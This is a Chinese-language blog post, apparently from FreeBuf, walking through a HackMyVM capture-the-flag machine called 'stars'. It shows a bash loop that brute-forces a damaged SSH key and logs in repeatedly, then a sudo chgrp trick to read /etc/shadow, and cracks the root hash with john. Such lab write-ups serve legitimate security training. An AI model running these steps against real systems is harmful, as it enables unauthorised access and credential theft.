freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

记一次hackmyvm综合靶场的渗透测试-stars
知非 2022-04-10 09:20:41 120664
所属地 黑龙江省

前言

本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!

信息收集阶段

靶机:192.168.1.128

Kali攻击机:未知

目标:user权限和root权限

nmap -sn 192.168.1.0/24

1649553236_62522f54e5e88b9eb7c91.png!small?1649553237254

nmap -A -p1-65535 192.168.1.3

1649553242_62522f5a22db8b0621934.png!small?1649553242461

开启了22端口和80端口:

漏洞利用阶段

访问下80端口:

http://192.168.1.3/

1649553249_62522f61d6fa23776b7c6.png!small?1649553250091

查看源代码:有个css!!

1649553258_62522f6ac6ad181c66a26.png!small?1649553259016

啥也没有?

1649553265_62522f713d4bdb655966c.png!small?1649553265483

扫个目录看一下:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.1.3 -x txt,php,html,zip,log

得出一下连接!

http://192.168.1.3/sshnote.txt

My RSA key is messed up, it looks like 3 capital letters have been replaced by stars.

Can you try to fix it?

sophie

我们RSA值乱了,它看起来3个大写字母已经被*替换了,你能修复它吗?

sophie(还给了个用户名?!)

然后RSA哪里找?!

访问首页:

http://192.168.1.3/index.php

1649553385_62522fe9ee11a4bdcffc5.png!small?1649553386204

我们把他BASE64解密:

cG9pc29uZWRnaWZ0LnR4dA%3D%3D


cG9pc29uZWRnaWZ0LnR4dA==


poisonedgift.txt

访问下:http://192.168.1.3/poisonedgift.txt

果然是密钥,还有三个星号,是三个大写字母!

1649553400_62522ff8085c86d62f2b2.png!small?1649553400372

首先,我们生成一个由三个大写字母组成的字典:

crunch 3 3 ABCDEFGHIJKLMNOPQRSTUVWXYZ > capital.txt

1649553406_62522ffea2e8d13e9a02f.png!small?1649553407107

接着,我们新建了脚本,让整个爆破过程自动化进行!

mkdir keysdir

wget http://192.168.1.3/poisonedgift.txt


vi run.sh

#!/bin/bash

key=poisonedgift.txt

keys=keysdir

dict=capital.txt

for i in $(cat $dict); do

echo $i

sed "s/\*\*\*/$i/" $key > $keys/$i.rsa

clear

done;

cd keysdir

chmod 600 *

for k in $(ls -1 *); do

echo $k

ssh -i $k sophie@192.168.1.3 2>/dev/null

clear

done;

已成功登录:

1649553436_6252301c4063eed95b0b7.png!small?1649553436550

1649553440_62523020e14eaa0925a33.png!small?1649553441135

1649553445_625230252f6618d6d22e8.png!small?1649553445420

第一个flag:

cat user.txt

a99ac90***********46511852

权限提升阶段

接着需要提权到root!!!

sudo -l一下:

1649553502_6252305e08ebb0a1319b9.png!small?1649553502302

可以使用root权限执行chgrp文件,chgrp可以变更文件或目录的所属群组,我们将/etc/shadow文件添加到sophie组里面

sudo chgrp sophie /etc/shadow

添加后打开shadow文件查看内容,并爆破密码!

cat /etc/shadow

1649553509_625230656355d0550d16a.png!small?1649553509635

攻击机上创建文件,将root用户的信息放到其中,再用john爆破!

vi pass


$1$root$dZ6JC474uVpAeG8g0oh/7.

1649553521_62523071bcb60f854402c.png!small?1649553522026

密码:barbarita

1649553528_6252307846f0050baac09.png!small?1649553528588

最后的flag:

cat /root/root.txt

bf3b0**********************2510aea2

# 渗透测试 # web安全 # CTF # 靶场平台 # 靶场实战
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 知非 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
hackmyvm靶场实战
知非 LV.8
这家伙太懒了,还未填写个人描述!
  • 125 文章数
  • 40 关注者
一个月学习通过商用密码测评师的经验分享
2025-01-09
等保2.0之AIX安全计算环境测评指导书
2023-05-10
记一次hackmyvm综合靶场的渗透测试-warez
2022-04-27
文章目录